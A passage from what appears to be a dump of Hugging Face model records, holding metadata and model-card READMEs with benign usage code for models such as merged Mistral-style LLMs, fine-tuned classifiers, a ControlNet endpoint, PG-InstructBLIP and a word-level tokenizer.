"SanjiWatsuki/Loyal-Macaroni-Maid-7B",
"base_model:SanjiWatsuki/Loyal-Macaroni-Maid-7B",
"base_model:merge:SanjiWatsuki/Loyal-Macaroni-Maid-7B",
"base_model:SanjiWatsuki/Silicon-Maid-7B",
"base_model:merge:SanjiWatsuki/Silicon-Maid-7B",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2024-01-22T00:17:17Z | ---
tags:
- merge
- mergekit
- lazymergekit
- SanjiWatsuki/Silicon-Maid-7B
- SanjiWatsuki/Loyal-Macaroni-Maid-7B
base_model:
- SanjiWatsuki/Silicon-Maid-7B
- SanjiWatsuki/Loyal-Macaroni-Maid-7B
---
# EE-Silicon-Maid-7B
Slerp
EE-Silicon-Maid-7B is a merge of the following models using [LazyMergekit](https://colab.research.google.com/drive/1obulZ1ROXHjYLn6PPZJwRR6GzgQogxxb?usp=sharing):
* [SanjiWatsuki/Silicon-Maid-7B](https://huggingface.co/SanjiWatsuki/Silicon-Maid-7B)
* [SanjiWatsuki/Loyal-Macaroni-Maid-7B](https://huggingface.co/SanjiWatsuki/Loyal-Macaroni-Maid-7B)
## 🧩 Configuration
```yaml
slices:
- sources:
- model: SanjiWatsuki/Silicon-Maid-7B
layer_range: [0, 32]
- model: SanjiWatsuki/Loyal-Macaroni-Maid-7B
layer_range: [0, 32]
merge_method: slerp
base_model: SanjiWatsuki/Silicon-Maid-7B
parameters:
t:
- filter: self_attn
value: [0, 0.5, 0.3, 0.7, 1]
- filter: mlp
value: [1, 0.5, 0.7, 0.3, 0]
- value: 0.5
dtype: bfloat16
```
## 💻 Usage
```python
!pip install -qU transformers accelerate
from transformers import AutoTokenizer
import transformers
import torch
model = "ND911/EE-Silicon-Maid-7B"
messages = [{"role": "user", "content": "What is a large language model?"}]
tokenizer = AutoTokenizer.from_pretrained(model)
prompt = tokenizer.apply_chat_template(messages, tokenize=False, add_generation_prompt=True)
pipeline = transformers.pipeline(
"text-generation",
model=model,
torch_dtype=torch.float16,
device_map="auto",
)
outputs = pipeline(prompt, max_new_tokens=256, do_sample=True, temperature=0.7, top_k=50, top_p=0.95)
print(outputs[0]["generated_text"])
``` |
CLMBR/binding-domain-transformer-3 | CLMBR | 2024-01-22T01:48:28Z | 12 | 0 | transformers | [
"transformers",
"pytorch",
"opt",
"text-generation",
"generated_from_trainer",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2024-01-17T22:41:58Z | ---
tags:
- generated_from_trainer
model-index:
- name: binding-domain-transformer-3
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# binding-domain-transformer-3
This model is a fine-tuned version of [](https://huggingface.co/) on the None dataset.
It achieves the following results on the evaluation set:
- Loss: 3.8650
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 5e-05
- train_batch_size: 32
- eval_batch_size: 32
- seed: 3
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: linear
- training_steps: 3052726
### Training results
| Training Loss | Epoch | Step | Validation Loss |
|:-------------:|:-----:|:-------:|:---------------:|
| 4.2244 | 0.03 | 76320 | 4.1909 |
| 4.0211 | 1.03 | 152640 | 4.0229 |
| 3.9159 | 0.03 | 228960 | 3.9493 |
| 3.8498 | 1.03 | 305280 | 3.9090 |
| 3.7991 | 0.03 | 381600 | 3.8841 |
| 3.7593 | 1.03 | 457920 | 3.8685 |
| 3.723 | 0.03 | 534240 | 3.8588 |
| 3.6924 | 1.03 | 610560 | 3.8515 |
| 3.6614 | 0.03 | 686880 | 3.8478 |
| 3.6384 | 1.03 | 763200 | 3.8438 |
| 3.615 | 0.03 | 839520 | 3.8439 |
| 3.5978 | 0.03 | 915840 | 3.8436 |
| 3.5793 | 1.03 | 992160 | 3.8439 |
| 3.5562 | 0.03 | 1068480 | 3.8438 |
| 3.5417 | 1.03 | 1144800 | 3.8447 |
| 3.5316 | 0.03 | 1221120 | 3.8448 |
| 3.5118 | 1.03 | 1297440 | 3.8462 |
| 3.4988 | 0.03 | 1373760 | 3.8479 |
| 3.487 | 1.03 | 1450080 | 3.8496 |
| 3.479 | 0.03 | 1526400 | 3.8513 |
| 3.4692 | 1.03 | 1602720 | 3.8529 |
| 3.461 | 0.03 | 1679040 | 3.8545 |
| 3.451 | 1.03 | 1755360 | 3.8554 |
| 3.4373 | 0.03 | 1831680 | 3.8589 |
| 3.4255 | 1.03 | 1908000 | 3.8589 |
| 3.4134 | 0.03 | 1984320 | 3.8601 |
| 3.4011 | 1.03 | 2060640 | 3.8621 |
| 3.3925 | 0.03 | 2136960 | 3.8635 |
| 3.3812 | 1.03 | 2213280 | 3.8640 |
| 3.37 | 0.03 | 2289600 | 3.8647 |
| 3.3613 | 1.03 | 2365920 | 3.8655 |
| 3.3524 | 0.03 | 2442240 | 3.8670 |
| 3.3382 | 1.03 | 2518560 | 3.8679 |
| 3.3299 | 0.03 | 2594880 | 3.8672 |
| 3.3211 | 1.03 | 2671200 | 3.8679 |
| 3.3176 | 0.03 | 2747520 | 3.8677 |
| 3.3103 | 1.03 | 2823840 | 3.8677 |
| 3.3062 | 0.03 | 2900160 | 3.8672 |
| 3.2996 | 1.03 | 2976480 | 3.8662 |
| 3.291 | 0.02 | 3052726 | 3.8650 |
### Framework versions
- Transformers 4.33.3
- Pytorch 2.0.1
- Datasets 2.12.0
- Tokenizers 0.13.3
|
rezaFarsh/binary_persian_sentiment_analysis | rezaFarsh | 2024-01-22T01:46:59Z | 8 | 0 | transformers | [
"transformers",
"safetensors",
"bert",
"text-classification",
"generated_from_trainer",
"base_model:sentence-transformers/LaBSE",
"base_model:finetune:sentence-transformers/LaBSE",
"license:apache-2.0",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] | text-classification | 2024-01-21T12:47:03Z | ---
license: apache-2.0
base_model: sentence-transformers/LaBSE
tags:
- generated_from_trainer
metrics:
- accuracy
model-index:
- name: binary_persian_sentiment_analysis
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# binary_persian_sentiment_analysis
This model is a fine-tuned version of [sentence-transformers/LaBSE](https://huggingface.co/sentence-transformers/LaBSE) on the None dataset.
It achieves the following results on the evaluation set:
- Loss: 0.5060
- Accuracy: 0.8805
- F1 Score: 0.8805
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 2e-05
- train_batch_size: 2
- eval_batch_size: 2
- seed: 42
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: linear
- num_epochs: 20
### Training results
| Training Loss | Epoch | Step | Validation Loss | Accuracy | F1 Score |
|:-------------:|:-----:|:------:|:---------------:|:--------:|:--------:|
| 0.5045 | 1.0 | 8359 | 0.5295 | 0.8816 | 0.8814 |
| 0.4211 | 2.0 | 16718 | 0.6029 | 0.8837 | 0.8837 |
| 0.3501 | 3.0 | 25077 | 0.5060 | 0.8805 | 0.8805 |
| 0.2541 | 4.0 | 33436 | 0.7740 | 0.8762 | 0.8762 |
| 0.2065 | 5.0 | 41795 | 0.8071 | 0.8746 | 0.8745 |
| 0.1915 | 6.0 | 50154 | 0.8341 | 0.8805 | 0.8805 |
| 0.137 | 7.0 | 58513 | 0.9235 | 0.8644 | 0.8644 |
| 0.0605 | 8.0 | 66872 | 0.9695 | 0.8584 | 0.8584 |
| 0.0405 | 9.0 | 75231 | 1.0090 | 0.8751 | 0.8751 |
| 0.0712 | 10.0 | 83590 | 1.0134 | 0.8767 | 0.8767 |
| 0.0295 | 11.0 | 91949 | 1.0266 | 0.8708 | 0.8709 |
| 0.0704 | 12.0 | 100308 | 0.9940 | 0.8767 | 0.8767 |
| 0.0233 | 13.0 | 108667 | 1.0747 | 0.8762 | 0.8762 |
| 0.0153 | 14.0 | 117026 | 1.0747 | 0.8741 | 0.8741 |
| 0.0245 | 15.0 | 125385 | 1.0027 | 0.8837 | 0.8837 |
| 0.0618 | 16.0 | 133744 | 0.9939 | 0.8778 | 0.8778 |
| 0.0087 | 17.0 | 142103 | 1.0448 | 0.8854 | 0.8853 |
| 0.0174 | 18.0 | 150462 | 1.0339 | 0.8837 | 0.8838 |
| 0.0185 | 19.0 | 158821 | 1.1171 | 0.8778 | 0.8778 |
| 0.0075 | 20.0 | 167180 | 1.1022 | 0.8827 | 0.8827 |
### Framework versions
- Transformers 4.35.2
- Pytorch 2.1.0+cu121
- Datasets 2.16.1
- Tokenizers 0.15.0
|
dagbs/TinyDolphin-2.8-1.1b-GGUF | dagbs | 2024-01-22T01:40:35Z | 14 | 3 | null | [
"gguf",
"en",
"dataset:cerebras/SlimPajama-627B",
"dataset:bigcode/starcoderdata",
"license:apache-2.0",
"endpoints_compatible",
"region:us"
] | null | 2024-01-22T01:18:25Z | ---
license: apache-2.0
datasets:
- cerebras/SlimPajama-627B
- bigcode/starcoderdata
language:
- en
quantized_by: dagbs
---
# TinyDolphin 2.8-1.1B - GGUF
- Model organization: [Cognitive Computations](https://huggingface.co/cognitivecomputations)
- Original model: [cognitivecomputations/TinyDolphin-2.8-1.1b](https://huggingface.co/cognitivecomputations/TinyDolphin-2.8-1.1b)

|
Charles-Elena/ControlNet-endpoint-test | Charles-Elena | 2024-01-22T01:36:01Z | 0 | 0 | null | [
"stable-diffusion",
"stable-diffusion-diffusers",
"controlnet",
"endpoints-template",
"arxiv:2302.05543",
"license:openrail",
"endpoints_compatible",
"region:us"
] | null | 2024-01-20T05:53:22Z | ---
license: openrail
tags:
- stable-diffusion
- stable-diffusion-diffusers
- controlnet
- endpoints-template
thumbnail: "https://huggingface.co/philschmid/ControlNet-endpoint/resolve/main/thumbnail.png"
inference: true
---
# Inference Endpoint for [ControlNet](https://huggingface.co/lllyasviel/ControlNet) using [runwayml/stable-diffusion-v1-5](https://huggingface.co/runwayml/stable-diffusion-v1-5)
> ControlNet is a neural network structure to control diffusion models by adding extra conditions.
> Official repository: https://github.com/lllyasviel/ControlNet
---
Blog post: [Controlled text to image generation with Inference Endpoints]()
This repository implements a custom `handler` task for `controlled text-to-image` generation on 🤗 Inference Endpoints. The code for the customized pipeline is in the [handler.py](https://huggingface.co/philschmid/ControlNet-endpoint/blob/main/handler.py).
There is also a [notebook](https://huggingface.co/philschmid/ControlNet-endpoint/blob/main/create_handler.ipynb) included, on how to create the `handler.py`

### expected Request payload
```json
{
"inputs": "A prompt used for image generation",
"negative_prompt": "low res, bad anatomy, worst quality, low quality",
"controlnet_type": "depth",
"image" : "iVBORw0KGgoAAAANSUhEUgAAAgAAAAIACAIAAAB7GkOtAAAABGdBTUEAALGPC",
}
```
supported `controlnet_type` are: `canny_edge`, `pose`, `depth`, `scribble`, `segmentation`, `normal`, `hed`, `hough`
below is an example on how to run a request using Python and `requests`.
## Use Python to send requests
1. Get image
```
wget https://huggingface.co/datasets/diffusers/test-arrays/resolve/main/stable_diffusion_imgvar/input_image_vermeer.png
```
2. Use the following code to send a request to the endpoint
```python
import json
from typing import List
import requests as r
import base64
from PIL import Image
from io import BytesIO
ENDPOINT_URL = "" # your endpoint url
HF_TOKEN = "" # your huggingface token `hf_xxx`
# helper image utils
def encode_image(image_path):
with open(image_path, "rb") as i:
b64 = base64.b64encode(i.read())
return b64.decode("utf-8")
def predict(prompt, image, negative_prompt=None, controlnet_type = "normal"):
image = encode_image(image)
# prepare sample payload
request = {"inputs": prompt, "image": image, "negative_prompt": negative_prompt, "controlnet_type": controlnet_type}
# headers
headers = {
"Authorization": f"Bearer {HF_TOKEN}",
"Content-Type": "application/json",
"Accept": "image/png" # important to get an image back
}
response = r.post(ENDPOINT_URL, headers=headers, json=request)
if response.status_code != 200:
print(response.text)
raise Exception("Prediction failed")
img = Image.open(BytesIO(response.content))
return img
prediction = predict(
prompt = "cloudy sky background lush landscape house and green trees, RAW photo (high detailed skin:1.2), 8k uhd, dslr, soft lighting, high quality, film grain, Fujifilm XT3",
negative_prompt ="lowres, bad anatomy, worst quality, low quality, city, traffic",
controlnet_type = "hed",
image = "huggingface.png"
)
prediction.save("result.png")
```
```
expected output

[Adding Conditional Control to Text-to-Image Diffusion Models](https://arxiv.org/abs/2302.05543) by Lvmin Zhang and Maneesh Agrawala.
Using the pretrained models we can provide control images (for example, a depth map) to control Stable Diffusion text-to-image generation so that it follows the structure of the depth image and fills in the details.
The abstract of the paper is the following:
We present a neural network structure, ControlNet, to control pretrained large diffusion models to support additional input conditions. The ControlNet learns task-specific conditions in an end-to-end way, and the learning is robust even when the training dataset is small (< 50k). Moreover, training a ControlNet is as fast as fine-tuning a diffusion model, and the model can be trained on a personal devices. Alternatively, if powerful computation clusters are available, the model can scale to large amounts (millions to billions) of data. We report that large diffusion models like Stable Diffusion can be augmented with ControlNets to enable conditional inputs like edge maps, segmentation maps, keypoints, etc. This may enrich the methods to control large diffusion models and further facilitate related applications. |
bidiptas/PG-InstructBLIP | bidiptas | 2024-01-22T01:21:57Z | 0 | 13 | null | [
"vision",
"image-captioning",
"image-to-text",
"en",
"arxiv:2309.02561",
"license:mit",
"region:us"
] | image-to-text | 2023-09-04T04:52:58Z | ---
language: en
license: mit
arxiv: 2309.02561
tags:
- vision
- image-captioning
pipeline_tag: image-to-text
---
# PG-InstructBLIP model
Finetuned version of InstructBLIP with Flan-T5-XXL as the language model. PG-InstructBLIP was introduced in the paper [Physically Grounded Vision-Language Models for Robotic Manipulation](https://iliad.stanford.edu/pg-vlm/) by Gao et al ([arxiv](arxiv.org/abs/2309.02561)).
## Model description
PG-InstructBLIP is finetuned using the [PhysObjects dataset](https://drive.google.com/file/d/1ThZ7p_5BnMboK_QE13m1fPKa4WGdRcfC/view?usp=sharing), an object-centric dataset of 36.9K crowd-sourced and 417K automated physical concept annotations of common household objects. This fine-tuning improves its understanding of physical object concepts, by capturing human priors of these concepts from visual appearance.
## Example Usage and Installation
This model is designed to be used with the LAVIS library. Please install [salesforce-lavis](https://pypi.org/project/salesforce-lavis/) from source and download this model through git-lfs or direct downloading.
After loading the model, you can disable the qformer text input to follow the same configuration we used for fine-tuning. However, the model still works well with it enabled, so we recommend users to experiment with both and choose the optimal configuration on a case-by-case basis.
Review the generate.py and test.py scripts provided in the Files tab for an example of using PG-InstructBLIP to determine the transparency of an opaque bowl.
```
import torch
from PIL import Image
from omegaconf import OmegaConf
from lavis.models import load_model, load_preprocess
from lavis.common.registry import registry
import requests
from generate import generate
url = "https://iliad.stanford.edu/pg-vlm/example_images/ceramic_bowl.jpg"
example_image = Image.open(requests.get(url, stream=True).raw).convert("RGB")
vlm = load_model(
name='blip2_t5_instruct',
model_type='flant5xxl',
checkpoint='pgvlm_weights.bin', # replace with location of downloaded weights
is_eval=True,
device="cuda" if torch.cuda.is_available() else "cpu"
)
vlm.qformer_text_input = False # Optionally disable qformer text
model_cls = registry.get_model_class('blip2_t5_instruct')
model_type = 'flant5xxl'
preprocess_cfg = OmegaConf.load(model_cls.default_config_path(model_type)).preprocess
vis_processors, _ = load_preprocess(preprocess_cfg)
processor = vis_processors["eval"]
question_samples = {
'prompt': 'Question: Classify this object as transparent, translucent, or opaque? Respond unknown if you are not sure. Short answer:',
'image': torch.stack([processor(example_image)], dim=0).to(vlm.device)
}
answers, scores = generate(vlm, question_samples, length_penalty=0, repetition_penalty=1, num_captions=3)
print(answers, scores)
# ['opaque', 'translucent', 'transparent'] tensor([-0.0373, -4.2404, -4.4436], device='cuda:0')
```
Note that the output of the generate function includes the log probabilities of each generation. For categorical properties (like material, transparency, and contents), these probabilities can be interpreted as confidences, as typical with VLMs. In the example above, PG-InstructBLIP is very confident that the ceramic bowl is opaque, which is true.
For continuous properties (like mass, fragility, and deformability), we recommend asking yes or no questions like "Is this object heavy?" and comparing the probabilities of the "yes" response between objects to determine which has a larger value.
For best results, we also recommend cropping input images to focus on the object in question, because PG-InstructBLIP is fine-tuned on object-centric data.
|
AMead10/Paul-Rosolie-v0 | AMead10 | 2024-01-22T01:15:34Z | 7 | 0 | transformers | [
"transformers",
"safetensors",
"vits",
"arxiv:1910.09700",
"endpoints_compatible",
"region:us"
] | null | 2024-01-18T05:22:32Z | ---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed]
|
Floyd93/my_awesome_opus_books_model | Floyd93 | 2024-01-22T01:14:55Z | 4 | 0 | transformers | [
"transformers",
"tensorboard",
"safetensors",
"t5",
"text2text-generation",
"generated_from_trainer",
"base_model:google-t5/t5-small",
"base_model:finetune:google-t5/t5-small",
"license:apache-2.0",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text2text-generation | 2024-01-07T15:55:47Z | ---
license: apache-2.0
base_model: t5-small
tags:
- generated_from_trainer
model-index:
- name: my_awesome_opus_books_model
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# my_awesome_opus_books_model
This model is a fine-tuned version of [t5-small](https://huggingface.co/t5-small) on the None dataset.
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 2e-05
- train_batch_size: 16
- eval_batch_size: 16
- seed: 42
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: linear
- num_epochs: 1
### Training results
| Training Loss | Epoch | Step | Validation Loss | Bleu | Gen Len |
|:-------------:|:-----:|:----:|:---------------:|:-------:|:-------:|
| No log | 1.0 | 1 | 0.7006 | 59.1006 | 19.0 |
### Framework versions
- Transformers 4.35.2
- Pytorch 2.1.0+cu121
- Datasets 2.16.1
- Tokenizers 0.15.0
|
zhangyanchao/whisper-small-zh_CN | zhangyanchao | 2024-01-22T01:09:20Z | 60 | 2 | transformers | [
"transformers",
"tensorboard",
"safetensors",
"whisper",
"automatic-speech-recognition",
"hf-asr-leaderboard",
"generated_from_trainer",
"hi",
"dataset:mozilla-foundation/common_voice_11_0",
"base_model:openai/whisper-small",
"base_model:finetune:openai/whisper-small",
"license:apache-2.0",
"endpoints_compatible",
"region:us"
] | automatic-speech-recognition | 2024-01-19T05:19:31Z | ---
language:
- hi
license: apache-2.0
base_model: openai/whisper-small
tags:
- hf-asr-leaderboard
- generated_from_trainer
datasets:
- mozilla-foundation/common_voice_11_0
model-index:
- name: Whisper Small zh_CN - Charles.djang
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# Whisper Small zh_CN - Charles.djang
This model is a fine-tuned version of [openai/whisper-small](https://huggingface.co/openai/whisper-small) on the Common Voice 11.0 dataset.
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 1e-05
- train_batch_size: 16
- eval_batch_size: 8
- seed: 42
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: linear
- lr_scheduler_warmup_steps: 500
- training_steps: 4000
- mixed_precision_training: Native AMP
### Framework versions
- Transformers 4.37.0.dev0
- Pytorch 2.1.2+cu121
- Datasets 2.16.1
- Tokenizers 0.15.0
|
homerquan/ppo-SnowballTarget | homerquan | 2024-01-22T01:04:49Z | 1 | 0 | ml-agents | [
"ml-agents",
"tensorboard",
"onnx",
"SnowballTarget",
"deep-reinforcement-learning",
"reinforcement-learning",
"ML-Agents-SnowballTarget",
"region:us"
] | reinforcement-learning | 2024-01-22T01:04:45Z | ---
library_name: ml-agents
tags:
- SnowballTarget
- deep-reinforcement-learning
- reinforcement-learning
- ML-Agents-SnowballTarget
---
# **ppo** Agent playing **SnowballTarget**
This is a trained model of a **ppo** agent playing **SnowballTarget**
using the [Unity ML-Agents Library](https://github.com/Unity-Technologies/ml-agents).
## Usage (with ML-Agents)
The Documentation: https://unity-technologies.github.io/ml-agents/ML-Agents-Toolkit-Documentation/
We wrote a complete tutorial to learn to train your first agent using ML-Agents and publish it to the Hub:
- A *short tutorial* where you teach Huggy the Dog 🐶 to fetch the stick and then play with him directly in your
browser: https://huggingface.co/learn/deep-rl-course/unitbonus1/introduction
- A *longer tutorial* to understand how works ML-Agents:
https://huggingface.co/learn/deep-rl-course/unit5/introduction
### Resume the training
```bash
mlagents-learn <your_configuration_file_path.yaml> --run-id=<run_id> --resume
```
### Watch your Agent play
You can watch your agent **playing directly in your browser**
1. If the environment is part of ML-Agents official environments, go to https://huggingface.co/unity
2. Step 1: Find your model_id: homerquan/ppo-SnowballTarget
3. Step 2: Select your *.nn /*.onnx file
4. Click on Watch the agent play 👀
|
phitime/flan-t5-base-finetuned-mlsum-tr | phitime | 2024-01-22T00:40:56Z | 14 | 0 | transformers | [
"transformers",
"tensorboard",
"safetensors",
"t5",
"text2text-generation",
"generated_from_trainer",
"base_model:google/flan-t5-base",
"base_model:finetune:google/flan-t5-base",
"license:apache-2.0",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text2text-generation | 2024-01-21T21:53:23Z | ---
license: apache-2.0
base_model: google/flan-t5-base
tags:
- generated_from_trainer
metrics:
- rouge
model-index:
- name: flan-t5-base-finetuned-mlsum-tr
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# flan-t5-base-finetuned-mlsum-tr
This model is a fine-tuned version of [google/flan-t5-base](https://huggingface.co/google/flan-t5-base) on an unknown dataset.
It achieves the following results on the evaluation set:
- Loss: nan
- Rouge1: 2.171
- Rouge2: 0.9864
- Rougel: 1.8331
- Rougelsum: 1.9493
- Gen Len: 18.4939
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 2e-05
- train_batch_size: 8
- eval_batch_size: 8
- seed: 42
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: linear
- num_epochs: 1
- mixed_precision_training: Native AMP
### Training results
| Training Loss | Epoch | Step | Validation Loss | Rouge1 | Rouge2 | Rougel | Rougelsum | Gen Len |
|:-------------:|:-----:|:-----:|:---------------:|:------:|:------:|:------:|:---------:|:-------:|
| 0.0 | 1.0 | 31160 | nan | 2.171 | 0.9864 | 1.8331 | 1.9493 | 18.4939 |
### Framework versions
- Transformers 4.35.2
- Pytorch 2.1.0+cu121
- Datasets 2.16.1
- Tokenizers 0.15.0
|
dustalov/wikitext-wordlevel | dustalov | 2024-01-22T00:39:29Z | 0 | 1 | tokenizers | [
"tokenizers",
"tokenizer",
"wordlevel",
"wikitext",
"en",
"dataset:wikitext",
"license:cc-by-sa-3.0",
"region:us"
] | null | 2024-01-10T20:26:37Z | ---
library_name: tokenizers
license: cc-by-sa-3.0
datasets:
- wikitext
language:
- en
tags:
- tokenizer
- wordlevel
- tokenizers
- wikitext
inference: false
---
# WikiText-WordLevel
This is a simple word-level tokenizer created using the [Tokenizers](https://github.com/huggingface/tokenizers) library. It was trained for educational purposes on the combined train, validation, and test splits of the [WikiText-103](https://huggingface.co/datasets/wikitext) corpus.
- Tokenizer Type: Word-Level
- Vocabulary Size: 75K
- Special Tokens: `<s>` (start of sequence), `</s>` (end of sequence), `<unk>` (unknown token)
- Normalization: [NFC](https://en.wikipedia.org/wiki/Unicode_equivalence#Normal_forms) (Normalization Form Canonical Composition), Strip, Lowercase
- Pre-tokenization: Whitespace
- Code: [wikitext-wordlevel.py](wikitext-wordlevel.py)
The tokenizer can be used as simple as follows.
```python
tokenizer = Tokenizer.from_pretrained('dustalov/wikitext-wordlevel')
tokenizer.encode("I'll see you soon").ids # => [68, 14, 2746, 577, 184, 595]
tokenizer.encode("I'll see you soon").tokens # => ['i', "'", 'll', 'see', 'you', 'soon']
tokenizer.decode([68, 14, 2746, 577, 184, 595]) # => "i ' ll see you soon"
```
|
kimwooglae/AISquare-Instruct-SOLAR-10.7b-v0.5.31 | kimwooglae | 2024-01-22T00:31:19Z | 1,369 | 0 | transformers | [
"transformers",
"pytorch",
"llama",
"text-generation",
"en",
"license:cc-by-nc-4.0",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2024-01-21T23:04:42Z | ---
language:
- en
pipeline_tag: text-generation
license: cc-by-nc-4.0
---
# AISquare-Instruct-SOLAR-10.7b-v0.5.31
## Model Details
**Developed by**
[Inswave Systems](https://www.inswave.com) UI Platform Team
**Base Model**
[upstage/SOLAR-10.7B-v1.0](https://huggingface.co/upstage/SOLAR-10.7B-v1.0)
# Implementation Code
```python
from transformers import AutoModelForCausalLM, AutoTokenizer
import torch
repo = "kimwooglae/AISquare-Instruct-SOLAR-10.7b-v0.5.31"
model = AutoModelForCausalLM.from_pretrained(
repo,
return_dict=True,
torch_dtype=torch.float16,
device_map='auto'
)
tokenizer = AutoTokenizer.from_pretrained(repo)
```
--- |
Nerdofdot/Nerdofdot_nickprock_sentence-bert-base-italian-uncased_TM_FTM | Nerdofdot | 2024-01-22T00:13:18Z | 4 | 0 | sentence-transformers | [
"sentence-transformers",
"safetensors",
"bert",
"feature-extraction",
"sentence-similarity",
"transformers",
"autotrain_compatible",
"text-embeddings-inference",
"endpoints_compatible",
"region:us"
] | sentence-similarity | 2024-01-22T00:13:03Z | ---
pipeline_tag: sentence-similarity
tags:
- sentence-transformers
- feature-extraction
- sentence-similarity
- transformers
---
# {MODEL_NAME}
This is a [sentence-transformers](https://www.SBERT.net) model: It maps sentences & paragraphs to a 768 dimensional dense vector space and can be used for tasks like clustering or semantic search.
<!--- Describe your model here -->
## Usage (Sentence-Transformers)
Using this model becomes easy when you have [sentence-transformers](https://www.SBERT.net) installed:
```
pip install -U sentence-transformers
```
Then you can use the model like this:
```python
from sentence_transformers import SentenceTransformer
sentences = ["This is an example sentence", "Each sentence is converted"]
model = SentenceTransformer('{MODEL_NAME}')
embeddings = model.encode(sentences)
print(embeddings)
```
## Usage (HuggingFace Transformers)
